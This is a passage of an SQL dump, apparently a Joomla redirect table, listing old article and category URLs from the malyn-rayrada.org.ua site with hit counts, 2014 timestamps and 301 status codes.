10:15:41','0000-00-00 00:00:00',301),(90,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-09-16 10:16:37','0000-00-00 00:00:00',301),(91,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-16 10:19:41','0000-00-00 00:00:00',301),(92,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57&Itemid=98&lang=uk','','','',6,0,'2014-09-16 10:20:46','0000-00-00 00:00:00',301),(93,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51&Itemid=92&lang=ru','','','',11,0,'2014-09-16 10:22:05','0000-00-00 00:00:00',301),(94,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=36&Itemid=70&lang=en','','','',9,0,'2014-09-16 10:22:11','0000-00-00 00:00:00',301),(95,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=uk&Itemid=0','','','',6,0,'2014-09-16 10:24:29','0000-00-00 00:00:00',301),(96,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&Itemid=14&lang=ru','','','',19,0,'2014-09-16 10:26:06','0000-00-00 00:00:00',301),(97,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:------l---2011-2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',16,0,'2014-09-16 10:26:08','0000-00-00 00:00:00',301),(98,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&Itemid=14&lang=uk','','','',24,0,'2014-09-16 10:26:15','0000-00-00 00:00:00',301),(99,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47&Itemid=86&lang=en','','','',11,0,'2014-09-16 10:28:44','0000-00-00 00:00:00',301),(100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49&Itemid=88&lang=en','','','',12,0,'2014-09-16 10:30:33','0000-00-00 00:00:00',301),(101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',20,0,'2014-09-16 10:30:36','0000-00-00 00:00:00',301),(102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47:-21022013-&Itemid=86&lang=en','','','',8,0,'2014-09-16 10:30:38','0000-00-00 00:00:00',301),(103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46:--21122012&Itemid=85&lang=en','','','',5,0,'2014-09-16 10:30:55','0000-00-00 00:00:00',301),(104,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53&Itemid=94&lang=uk','','','',11,0,'2014-09-16 10:31:10','0000-00-00 00:00:00',301),(105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-16 10:31:12','0000-00-00 00:00:00',301),(106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',15,0,'2014-09-16 10:32:18','0000-00-00 00:00:00',301),(107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-16 10:35:18','0000-00-00 00:00:00',301),(108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53&Itemid=94&lang=ru','','','',5,0,'2014-09-16 10:35:23','0000-00-00 00:00:00',301),(109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-16 10:35:32','0000-00-00 00:00:00',301),(110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-16 10:36:00','0000-00-00 00:00:00',301),(111,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=ru','','','',14,0,'2014-09-16 10:36:14','0000-00-00 00:00:00',301),(112,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46&Itemid=85&lang=en','','','',9,0,'2014-09-16 10:36:21','0000-00-00 00:00:00',301),(113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49&Itemid=88&lang=en','','','',17,0,'2014-09-16 10:37:00','0000-00-00 00:00:00',301),(114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-16 10:37:03','0000-00-00 00:00:00',301),(115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=6&lang=en','','','',62,0,'2014-09-16 10:37:20','0000-00-00 00:00:00',301),(116,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46&Itemid=85&lang=uk','','','',11,0,'2014-09-16 10:37:48','0000-00-00 00:00:00',301),(117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56&Itemid=97&lang=ru','','','',9,0,'2014-09-16 10:38:59','0000-00-00 00:00:00',301),(118,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46:--21122012&Itemid=85&lang=ru','','','',2,0,'2014-09-16 10:39:01','0000-00-00 00:00:00',301),(119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54:--29112013-&Itemid=95&lang=uk','','','',13,0,'2014-09-16 10:39:16','0000-00-00 00:00:00',301),(120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-16 10:39:54','0000-00-00 00:00:00',301),(121,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=6&layout=blog&Itemid=9&lang=en','','','',7,0,'2014-09-16 10:39:56','0000-00-00 00:00:00',301),(122,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54&Itemid=95&lang=uk','','','',4,0,'2014-09-16 10:40:24','0000-00-00 00:00:00',301),(123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',15,0,'2014-09-16 10:40:27','0000-00-00 00:00:00',301),(124,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',11,0,'2014-09-16 10:43:43','0000-00-00 00:00:00',301),(125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-16 10:45:16','0000-00-00 00:00:00',301),(126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-16 10:45:43','0000-00-00 00:00:00',301),(127,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59:--20062014-&Itemid=107&lang=ru','','','',9,0,'2014-09-16 10:53:10','0000-00-00 00:00:00',301),(128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47:--21022013-&Itemid=86&lang=ru','','','',7,0,'2014-09-16 11:03:02','0000-00-00 00:00:00',301),(129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59:--20062014-&Itemid=107&lang=en','','','',10,0,'2014-09-16 11:05:12','0000-00-00 00:00:00',301),(130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&Itemid=14&lang=uk','','http://www.google.com.ua/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CB4QFjAA&url=http%3A%2F%2Fwww.malyn-rayrada.org.ua%2Findex.php%3Foption%3Dcom_c','',18,0,'2014-09-16 11:12:05','0000-00-00 00:00:00',301),(131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=en&Itemid=','','','',9,0,'2014-09-16 11:16:06','0000-00-00 00:00:00',301),(132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=uk','','','',3,0,'2014-09-16 11:17:30','0000-00-00 00:00:00',301),(133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=uk','','','',4,0,'2014-09-16 11:17:52','0000-00-00 00:00:00',301),(134,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=ru&Itemid=','','','',5,0,'2014-09-16 11:18:08','0000-00-00 00:00:00',301),(135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1375:-33-6-&catid=11&Itemid=14&lang=uk','','','',23,0,'2014-09-16 11:19:35','0000-00-00 00:00:00',301),(136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',16,0,'2014-09-16 11:21:00','0000-00-00 00:00:00',301),(137,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56&Itemid=97&lang=uk','','','',13,0,'2014-09-16 11:22:10','0000-00-00 00:00:00',301),(138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=uk','','','',8,0,'2014-09-16 11:22:14','0000-00-00 00:00:00',301),(139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-16 11:24:36','0000-00-00 00:00:00',301),(140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-16 11:24:56','0000-00-00 00:00:00',301),(141,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53&Itemid=94&lang=uk','','','',16,0,'2014-09-16 11:24:58','0000-00-00 00:00:00',301),(142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',11,0,'2014-09-16 11:25:22','0000-00-00 00:00:00',301),(143,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53:--25102013-&Itemid=94&lang=uk','','','',13,0,'2014-09-16 11:25:30','0000-00-00 00:00:00',301),(144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-16 11:25:49','0000-00-00 00:00:00',301),(145,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',9,0,'2014-09-16 11:26:01','0000-00-00 00:00:00',301),(146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-16 11:26:25','0000-00-00 00:00:00',301),(147,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-16 11:26:41','0000-00-00 00:00:00',301),(148,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53:--25102013-&Itemid=94&lang=uk','','','',16,0,'2014-09-16 11:26:44','0000-00-00 00:00:00',301),(149,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53&Itemid=94&lang=ru','','','',4,0,'2014-09-16 11:26:57','0000-00-00 00:00:00',301),(150,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',16,0,'2014-09-16 11:27:11','0000-00-00 00:00:00',301),(151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=ru&Itemid=0','','','',7,0,'2014-09-16 11:27:45','0000-00-00 00:00:00',301),(152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60:--11072014-&Itemid=108&lang=uk','','','',14,0,'2014-09-16 11:27:49','0000-00-00 00:00:00',301),(153,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=ru&Itemid=','','','',7,0,'2014-09-16 11:28:50','0000-00-00 00:00:00',301),(154,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-16 11:28:52','0000-00-00 00:00:00',301),(155,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46:--21122012&Itemid=85&lang=en','','','',8,0,'2014-09-16 11:29:24','0000-00-00 00:00:00',301),(156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-16 11:29:26','0000-00-00 00:00:00',301),(157,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54:--29112013-&Itemid=95&lang=ru','','','',15,0,'2014-09-16 11:33:41','0000-00-00 00:00:00',301),(158,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:41:00','0000-00-00 00:00:00',301),(159,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:41:07','0000-00-00 00:00:00',301),(160,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:41:15','0000-00-00 00:00:00',301),(161,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:41:23','0000-00-00 00:00:00',301),(162,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:41:31','0000-00-00 00:00:00',301),(163,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:41:42','0000-00-00 00:00:00',301),(164,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:41:53','0000-00-00 00:00:00',301),(165,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:42:03','0000-00-00 00:00:00',301),(166,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:42:12','0000-00-00 00:00:00',301),(167,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:42:21','0000-00-00 00:00:00',301),(168,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:42:31','0000-00-00 00:00:00',301),(169,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:42:39','0000-00-00 00:00:00',301),(170,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:42:50','0000-00-00 00:00:00',301),(171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:------------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',17,0,'2014-09-16 11:42:55','0000-00-00 00:00:00',301),(172,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=en&Itemid=0','','','',6,0,'2014-09-16 11:42:59','0000-00-00 00:00:00',301),(173,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:43:10','0000-00-00 00:00:00',301),(174,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:43:19','0000-00-00 00:00:00',301),(175,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-16 11:43:32','0000-00-00 00:00:00',301),(176,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:43:39','0000-00-00 00:00:00',301),(177,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:43:48','0000-00-00 00:00:00',301),(178,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:43:56','0000-00-00 00:00:00',301),(179,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:44:04','0000-00-00 00:00:00',301),(180,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-16 11:44:14','0000-00-00 00:00:00',301),(181,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-16 11:44:22','0000-00-00 00:00:00',301),(182,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:44:31','0000-00-00 00:00:00',301),(183,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:44:39','0000-00-00 00:00:00',301),(184,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:44:48','0000-00-00 00:00:00',301),(185,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-16 11:44:59','0000-00-00 00:00:00',301),(186,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:45:07','0000-00-00 00:00:00',301),(187,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:45:15','0000-00-00 00:00:00',301),(188,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-16 11:45:27','0000-00-00 00:00:00',301),(189,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:45:38','0000-00-00 00:00:00',301),(190,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-16 11:45:44','0000-00-00 00:00:00',301),(191,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-16 11:45:54','0000-00-00 00:00:00',301),(192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:46:00','0000-00-00 00:00:00',301),(193,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:46:10','0000-00-00 00:00:00',301),(194,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:46:19','0000-00-00 00:00:00',301),(195,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-16 11:46:27','0000-00-00 00:00:00',301),(196,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:46:36','0000-00-00 00:00:00',301),(197,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:46:45','0000-00-00 00:00:00',301),(198,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:46:52','0000-00-00 00:00:00',301),(199,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:47:01','0000-00-00 00:00:00',301),(200,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-16 11:47:08','0000-00-00 00:00:00',301),(201,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:47:19','0000-00-00 00:00:00',301),(202,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:47:28','0000-00-00 00:00:00',301),(203,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:47:36','0000-00-00 00:00:00',301),(204,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:47:45','0000-00-00 00:00:00',301),(205,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-16 11:47:53','0000-00-00 00:00:00',301),(206,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:48:00','0000-00-00 00:00:00',301),(207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:48:08','0000-00-00 00:00:00',301),(208,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:48:16','0000-00-00 00:00:00',301),(209,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:48:23','0000-00-00 00:00:00',301),(210,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 11:48:31','0000-00-00 00:00:00',301),(211,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-16 11:48:38','0000-00-00 00:00:00',301),(212,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:48:47','0000-00-00 00:00:00',301),(213,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:48:55','0000-00-00 00:00:00',301),(214,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:49:05','0000-00-00 00:00:00',301),(215,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-16 11:49:17','0000-00-00 00:00:00',301),(216,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-16 11:49:28','0000-00-00 00:00:00',301),(217,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=en&Itemid=0','','','',6,0,'2014-09-16 11:49:37','0000-00-00 00:00:00',301),(218,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:49:48','0000-00-00 00:00:00',301),(219,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:49:56','0000-00-00 00:00:00',301),(220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-16 11:50:08','0000-00-00 00:00:00',301),(221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:50:18','0000-00-00 00:00:00',301),(222,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=en&Itemid=0','','','',6,0,'2014-09-16 11:50:28','0000-00-00 00:00:00',301),(223,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:50:36','0000-00-00 00:00:00',301),(224,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:50:45','0000-00-00 00:00:00',301),(225,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-16 11:50:54','0000-00-00 00:00:00',301),(226,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 11:51:03','0000-00-00 00:00:00',301),(227,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:51:13','0000-00-00 